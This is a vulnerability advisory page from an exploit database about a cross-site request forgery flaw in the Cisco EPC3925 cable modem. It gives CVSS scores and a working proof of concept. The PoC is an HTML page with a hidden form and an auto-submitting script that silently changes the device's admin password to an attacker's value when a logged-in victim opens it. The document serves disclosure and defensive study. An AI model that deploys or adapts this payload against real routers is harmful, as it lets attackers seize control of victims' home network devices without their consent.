Cisco EPC3925 Cross Site Request Forgery

2013-12-16 / 2013-12-21
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################################### # Exploit Title: Cisco EPC3925 Cross Site Request Forgery # Google Dork: N/A # Date: 12-11-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.cisco.com # Software Link: Not public # Version: epc3925-E10-5-v302r125572-130520c # Tested on: Cisco EPC3925 # CVE: N/A ####################################################################### # Description: # # This proof of concept demonstrates that the admin password can be # changed by an attacker in a CSRF attack. However, it seems like any # setting in the device can be manipulated using an attack like this. # # # Side note: The device does not ask for the current password. # # # Location: # # POST http://[target]/goform/Quick_setup # # Parameters: # # Password=&PasswordReEnter=&save=Save+Settings # # PoC: # # <html> # # <form name="reseller" method="POST" action="http://[target]/goform/Quick_setup" id="csrf_attack" target="csrf_iframe"> # <input type="hidden" name="Password" value="attackers_password"> # <input type="hidden" name="PasswordReEnter" value="attackers_password"> # <input type="hidden" name="save" value="Save Settings"> # </form> # # <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe> # # <script> # document.getElementById('csrf_attack').submit(); # </script> # <center>The payload has been executed....</center> # # </html> # # Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/

References:

http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top